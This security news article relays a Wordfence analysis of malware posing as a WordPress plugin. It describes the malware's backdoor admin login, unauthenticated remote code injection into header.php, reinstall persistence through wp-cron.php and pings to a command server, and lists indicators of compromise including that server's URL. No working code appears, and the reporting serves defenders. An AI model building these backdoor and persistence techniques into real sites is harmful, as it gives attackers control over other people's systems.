WordPress Malware Alert: Fake Anti-Malware Plugin Grants Admin Access and Executes Remote Code

The Wordfence Threat Intelligence team has issued a critical warning about a sophisticated malware variant that is disguising itself as a legitimate WordPress plugin. Discovered during a site clean on January 22, 2025, this malware appears as a benign file — often named WP-antymalwary-bot.php — yet grants attackers extensive control over compromised WordPress sites.

According to Wordfence, “this malware variant appears in the file system as a normal WordPress plugin, often with the name ‘WP-antymalwary-bot.php’, and contains several functions that allow attackers to maintain access to your site, hide the plugin from the dashboard, and execute remote code.”

At first glance, the malicious plugin seems legitimate, complete with header comments, code indentation, and professional structure. However, under the surface, it offers attackers a wide arsenal of capabilities, including:

• Administrator Access: Using a backdoor function (emergency_login_all_admins), attackers can immediately log in as the first administrator user by sending a crafted GET request.
• Remote Code Execution: A REST API route is registered without any permission checks, allowing attackers to inject PHP code into theme files like header.php.
• Persistence Mechanism: Even if the plugin is deleted, a modified wp-cron.php file reinstalls and reactivates it during the next site visit.

As Wordfence explains, “Should the plugin be removed from the plugins directory, the wp-cron.php file will replace it upon the next site visit to the site allowing a threat actor to maintain persistence on a compromised site, if not thoroughly remediated.”

The malware further enhances stealth by:

• Hiding from WordPress Admin Dashboard: The hide_plugin_from_list function ensures the plugin remains invisible to site administrators.
• Communicating with a Command & Control (C2) Server: Infected sites send periodic “ping” updates to a server located in Cyprus (IP: 45.61.136.85) to inform the attacker about their operational status.
• Injecting Malicious JavaScript Ads: Via obfuscated methods, malicious ads are loaded dynamically into the <head> section of the site’s pages using scripts retrieved from compromised external resources.

Wordfence notes, “The file ads.php simply contains a base64 encoded URL to a JavaScript file on yet another hacked site for added obfuscation.”

Newer versions of this malware have evolved rapidly, integrating additional mechanisms like:

• Scheduled WordPress events to automate malicious communication.
• Enhanced methods to update ad-serving URLs dynamically.
• Encrypted payloads injected into header.php, requiring decryption keys supplied through URL parameters — making detection even harder.

Wordfence observed that, “The information sent to the C&C server includes the site URL as well as a timestamp, which is sent every minute.”

Site administrators should urgently look for:

• Requests to http://45.61.136.85:5555/api/plugin-ping
• Presence of emergency_login GET parameters in access logs
• Modifications to wp-cron.php
• Unexpected “patterns” directories within theme folders
• Alterations to theme header.php files

The malware has been seen under various disguises, including:

• WP-antymalwary-bot.php
• addons.php
• wpconsole.php
• wp-performance-booster.php
• scr.php

Related Posts:

• Breaking News: Widespread WordPress Plugin Compromise in Active Supply Chain Attack
• Captcha Plugin include backdoor that affects 300K WordPress sites
• WordPress Issues Urgent Security Update to Patch Multiple Vulnerabilities